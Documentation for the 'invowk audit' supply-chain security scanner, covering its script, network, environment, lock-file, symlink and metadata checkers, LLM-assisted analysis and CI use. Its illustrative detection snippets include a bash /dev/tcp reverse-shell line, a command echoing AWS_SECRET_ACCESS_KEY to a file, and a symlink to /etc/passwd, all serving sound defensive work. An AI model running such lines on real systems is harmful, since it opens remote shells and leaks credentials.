
Security Auditing

Invowk includes a built-in security scanner that analyzes invowkfiles, modules, vendored dependencies, and script content for supply-chain vulnerabilities, script injection, path traversal, suspicious patterns, and lock file integrity issues.

Quick Start

# Scan current directory
invowk audit

# Scan a specific module
invowk audit ./tools.invowkmod

# Only show high and critical findings
invowk audit --severity high

# JSON output for CI
invowk audit --format json

# Include global modules
invowk audit --include-global

How It Works

The invowk audit command builds an immutable snapshot of all discovered artifacts (invowkfiles, modules, scripts, lock files), then runs 6 built-in security checkers concurrently. After all checkers complete, a correlator cross-references findings to detect compound threats.

invowk audit [path]

├── Discovery ──► Immutable ScanContext snapshot

├── Concurrent Checkers (6 built-in + optional LLM)
│ ├── Script Checker ──► execution, path-traversal, obfuscation findings
│ ├── Network Checker ──► exfiltration findings
│ ├── Env Checker ──► exfiltration findings
│ ├── Lock File Checker ──► integrity findings
│ ├── Symlink Checker ──► path-traversal findings
│ ├── Module Metadata Checker ──► trust findings
│ └── LLM Checker (opt-in) ──► multi-category findings

├── Correlator ──► compound threat detection

└── Report ──► text or JSON output

Scan Targets

The scanner auto-detects the target type based on the path:

| Path | What Gets Scanned |
| --- | --- |
| Directory (default .) | Root invowkfile + all *.invowkmod directories + discovery sources |
| *.invowkmod directory | Single module (invowkfile + lock file + vendored deps) |
| *.cue file | Single standalone invowkfile |

When scanning a directory, the scanner also discovers modules from configured includes paths and optionally from ~/.invowk/cmds/ (with --include-global).

Built-in Checkers

Script Checker

Analyzes script content and paths for dangerous execution patterns.

Detects:

  • Remote code execution: curl | bash, wget | sh, silent download-and-execute
  • Path traversal: ../ sequences in script content
  • Obfuscation: base64 encoding/decoding, eval with dynamic content, hex sequences
  • Unusually large script files (>5 MiB)
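The remote-execution rules can be approximated with a simple pattern check. The sketch below is illustrative only — the file path and regex are made up for the demo and are not invowk's actual rules:

```shell
# Illustrative only: a grep pattern in the spirit of the Script Checker's
# remote-code-execution rules (not invowk's actual regexes).
cat > /tmp/suspicious.sh <<'EOF'
curl -fsSL https://example.com/install.sh | bash
EOF

# Flag a download tool piped straight into a shell interpreter.
if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh' /tmp/suspicious.sh; then
  echo "finding: remote download piped to a shell"
fi
```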

Network Checker

Scans scripts for network access patterns that may indicate data exfiltration.

Detects:

  • Reverse shell patterns (bash, Python, Perl, netcat)
  • DNS exfiltration (dig, nslookup with dynamic subdomains)
  • Encoded URLs (base64-encoded network targets)
  • Suspicious network commands in unexpected contexts
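To make the reverse-shell category concrete, here is the classic bash idiom the checker looks for, with a hedged detection sketch (the file path and pattern are illustrative, not invowk's implementation):

```shell
# Illustrative only: flag the classic bash reverse-shell idiom.
cat > /tmp/netcheck.sh <<'EOF'
bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
EOF

# /dev/tcp redirection is a strong reverse-shell indicator in scripts.
if grep -Fq '/dev/tcp/' /tmp/netcheck.sh; then
  echo "finding: possible reverse shell (/dev/tcp redirection)"
fi
```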

Environment Checker

Analyzes environment configuration and script content for credential exposure risks.

Detects:

  • Risky env_inherit_mode: "all" (exposes all host environment variables)
  • Access to sensitive variables: AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, DATABASE_URL, passwords, private keys
  • Credential extraction patterns in scripts
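Sensitive-variable access can be sketched as a name-list scan. Again, this is only a rough approximation of the idea — the variable list and file path are illustrative:

```shell
# Illustrative only: scan for references to well-known sensitive variables.
cat > /tmp/envcheck.sh <<'EOF'
echo "$AWS_SECRET_ACCESS_KEY" > /tmp/out
export DB="$DATABASE_URL"
EOF

# List each sensitive name referenced, deduplicated.
grep -Eo 'AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN|DATABASE_URL' /tmp/envcheck.sh | sort -u
# -> AWS_SECRET_ACCESS_KEY
#    DATABASE_URL
```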

Lock File Checker

Validates module lock file integrity for tamper detection.

Detects:

  • SHA-256 hash mismatches between locked and actual module content
  • Orphaned lock entries (locked modules no longer in dependency tree)
  • Missing lock entries (dependencies not yet locked)
  • Ambiguous entries and version format issues
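The hash-mismatch check boils down to comparing a recorded digest against a freshly computed one. A minimal sketch of that comparison (file names and contents are made up for the demo):

```shell
# Illustrative only: the kind of hash comparison a lock file check performs.
printf 'module content v1\n' > /tmp/mod.cue
locked_hash=$(sha256sum /tmp/mod.cue | cut -d' ' -f1)   # hash recorded at lock time

printf 'tampered content\n' > /tmp/mod.cue              # simulate post-lock tampering
actual_hash=$(sha256sum /tmp/mod.cue | cut -d' ' -f1)   # hash of current content

if [ "$locked_hash" != "$actual_hash" ]; then
  echo "finding: SHA-256 mismatch (module content changed after locking)"
fi
```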

Symlink Checker

Walks module directories checking for symlink-based escape attacks.

Detects:

  • Symlinks pointing outside the module boundary
  • Symlink chains (symlink → symlink)
  • Dangling symlinks (target does not exist)
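Boundary escape can be sketched by resolving a link and checking whether the target stays under the module root. The paths below are made up for the demo; this is not invowk's actual walk logic:

```shell
# Illustrative only: detect a symlink whose resolved target escapes a module dir.
mkdir -p /tmp/mymod
ln -sf /etc/passwd /tmp/mymod/escape

target=$(readlink -f /tmp/mymod/escape)   # fully resolve the link
case "$target" in
  /tmp/mymod/*) echo "ok: target stays inside the module" ;;
  *)            echo "finding: symlink escapes module boundary -> $target" ;;
esac
```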

Module Metadata Checker

Analyzes module dependency chains and metadata for supply-chain risks.

Detects:

  • Typosquatting: Module names similar to popular modules (Levenshtein distance)
  • Fan-out: Modules with excessive dependency counts
  • Missing version pins: Dependencies without pinned versions
  • Undeclared transitive deps: Dependencies required by sub-dependencies but not declared in root invowkmod.cue
  • Global module trust: Modules from ~/.invowk/cmds/ that bypass local review

Compound Threat Detection

The correlator identifies when findings from different checkers appear in the same attack surface, indicating coordinated threats:

| Compound Threat | Checkers Involved | Severity |
| --- | --- | --- |
| Credential exfiltration | Env + Network | Critical |
| Path + symlink escape | Script + Symlink | Critical |
| Obfuscated exfiltration | Script + Network | Critical |
| Trust chain weakness | Module Metadata + Lock File | High |

Automatic severity escalation:

  • 3+ distinct security categories in the same surface → Critical
  • High + any other finding in the same surface → Critical
  • 2+ Medium findings in the same surface → High
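The first escalation rule amounts to counting distinct categories on one surface. A toy sketch of that rule (the category names are invented for the demo):

```shell
# Illustrative only: the "3+ distinct categories => Critical" escalation rule.
surface_categories="exfiltration execution path-traversal"

distinct=$(printf '%s\n' $surface_categories | sort -u | wc -l)
if [ "$distinct" -ge 3 ]; then
  echo "escalate: critical (3+ distinct categories on one surface)"
fi
```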

Severity Levels

| Level | Meaning |
| --- | --- |
| critical | Immediate action required; likely active exploit or coordinated attack |
| high | Serious risk; should be addressed before using the module |
| medium | Notable concern; warrants investigation |
| low | Minor issue; consider addressing |
| info | Informational observation; no action typically needed |

Use --severity to filter the minimum level shown:

# Only critical and high findings
invowk audit --severity high

# Everything including informational
invowk audit --severity info

Flags

| Flag | Default | Description |
| --- | --- | --- |
| --format | text | Output format: text or json |
| --severity | low | Minimum severity: info, low, medium, high, critical |
| --include-global | false | Include ~/.invowk/cmds/ in scan |

Exit Codes

| Code | Meaning |
| --- | --- |
| 0 | No findings at or above the severity threshold |
| 1 | Findings detected |
| 2 | Scan error |

LLM-Powered Analysis

For deeper semantic analysis beyond pattern matching, enable LLM-powered auditing with the --llm flag. This sends script content to a local or remote LLM through any OpenAI-compatible API.

Why LLM analysis?

Built-in checkers use regex patterns — they are fast and deterministic but can only detect known patterns. LLM analysis reasons about code intent, catching novel attack vectors, subtle logic flaws, and context-dependent security issues that regex cannot express.

Setup

The LLM checker works with any server implementing the OpenAI /v1/chat/completions API. The default configuration targets Ollama, a widely used local LLM server:

# 1. Install Ollama
curl -fsSL https://ollama.com/install.sh | sh

# 2. Pull a code-focused model
ollama pull qwen2.5-coder:7b

# 3. Run the audit with LLM analysis
invowk audit --llm

Compatible Servers

| Server | Default URL | Notes |
| --- | --- | --- |
| Ollama | http://localhost:11434/v1 | Default target, best local experience |
| LM Studio | http://localhost:1234/v1 | GUI-first, good model browser |
| llamafile | http://localhost:8080/v1 | Single-file executable, zero install |
| vLLM | http://localhost:8000/v1 | Production-grade, GPU-optimized |
| OpenAI | https://api.openai.com/v1 | Cloud, requires API key |

LLM Flags

| Flag | Default | Env Override | Description |
| --- | --- | --- | --- |
| --llm | false | (none) | Enable LLM-powered analysis |
| --llm-url | http://localhost:11434/v1 | INVOWK_LLM_URL | API base URL |
| --llm-model | qwen2.5-coder:7b | INVOWK_LLM_MODEL | Model name |
| --llm-api-key | (empty) | INVOWK_LLM_API_KEY | API key (empty for local servers) |
| --llm-timeout | 2m | INVOWK_LLM_TIMEOUT | Per-request timeout |
| --llm-concurrency | 2 | INVOWK_LLM_CONCURRENCY | Max parallel LLM requests |

Recommended Models

| Model | RAM | Quality | Notes |
| --- | --- | --- | --- |
| qwen2.5-coder:7b | 8 GB | Good | Default, fits most machines |
| qwen2.5-coder:14b | 16 GB | Better | Good balance |
| qwen2.5-coder:32b | 24 GB | Best | GPT-4o level for code |
| deepseek-coder:33b | 24 GB | Excellent | Best for chain-of-thought reasoning |

Model Auto-Detection

When --llm is enabled, invowk verifies the configured model is available on the server before scanning. If the model is not found, it shows:

  • The list of available models on the server
  • A suggestion for the best code-focused alternative (detected dynamically by pattern matching)
$ invowk audit --llm --llm-model nonexistent-model
LLM model not found: "nonexistent-model" is not available on the server; try: qwen2.5-coder:14b
available models: llama3:8b, qwen2.5-coder:14b, mistral:7b

The detection recognizes code-focused model families (qwen2.5-coder, deepseek-coder, codellama, codegemma, starcoder, codestral) regardless of version or quantization variant.
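The family match can be pictured as a prefix check against the model list, ignoring whatever tag or quantization suffix follows. A hedged sketch — the model names are examples, and this is not invowk's actual detection code:

```shell
# Illustrative only: match code-focused model families regardless of
# version tag or quantization variant.
printf '%s\n' llama3:8b qwen2.5-coder:14b mistral:7b deepseek-coder:33b-q4 |
  grep -E '^(qwen2\.5-coder|deepseek-coder|codellama|codegemma|starcoder|codestral)'
# -> qwen2.5-coder:14b
#    deepseek-coder:33b-q4
```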

Examples

# Auto-detect best available provider (local Ollama first, then cloud)
invowk audit --llm-provider auto

# Use a specific provider (works with OAuth — no API key needed)
invowk audit --llm-provider claude
invowk audit --llm-provider codex
invowk audit --llm-provider gemini

# Override model within a provider
invowk audit --llm-provider claude --llm-model claude-opus-4-6

# Manual configuration (Ollama, LM Studio, or any OpenAI-compatible server)
invowk audit --llm
invowk audit --llm --llm-url http://localhost:1234/v1

# Combined: provider + high severity + JSON
invowk audit --llm-provider auto --severity high --format json

How It Works

The LLM checker:

  1. Verifies the configured model exists on the server (with suggestions if not)
  2. Filters scripts: excludes file-only references and empty scripts
  3. Batches scripts by character count (~6000 chars) and count (max 5 per batch)
  4. Sends each batch to the LLM with a security analyst system prompt
  5. Parses structured JSON findings from the response
  6. Validates severity and category against existing enums (discards hallucinated values)
  7. Merges findings into the same pipeline as built-in checkers

LLM findings participate in compound threat detection — if the LLM flags an exfiltration pattern and a built-in checker flags sensitive variable access in the same module, the correlator escalates to Critical.

Script content is sent to the configured server

When --llm is enabled, script content from your invowkfiles and modules is sent to the configured API endpoint. For local servers (Ollama, LM Studio), data stays on your machine. For cloud APIs, review your provider's data handling policies.

CI Integration

Basic CI Gate

# Fail pipeline if any high/critical findings
invowk audit --severity high

JSON Output for Automation

# Full JSON output
invowk audit --format json

# Parse findings count
invowk audit --format json | jq '.summary.total'

# List finding titles
invowk audit --format json | jq '.findings[] | "[\(.severity)] \(.title)"'

# Check for compound threats
invowk audit --format json | jq '.compound_threats'

GitHub Actions Example

- name: Security audit
  run: |
    status=0
    invowk audit --severity high --format json > audit-results.json || status=$?
    if [ "$status" -eq 1 ]; then
      echo "::error::Security findings detected"
      jq -r '.findings[] | "[\(.severity)] \(.title)"' audit-results.json
      exit 1
    fi

With LLM in CI

- name: Start Ollama
  run: |
    curl -fsSL https://ollama.com/install.sh | sh
    ollama pull qwen2.5-coder:7b

- name: Security audit (with LLM)
  run: invowk audit --llm --severity high --format json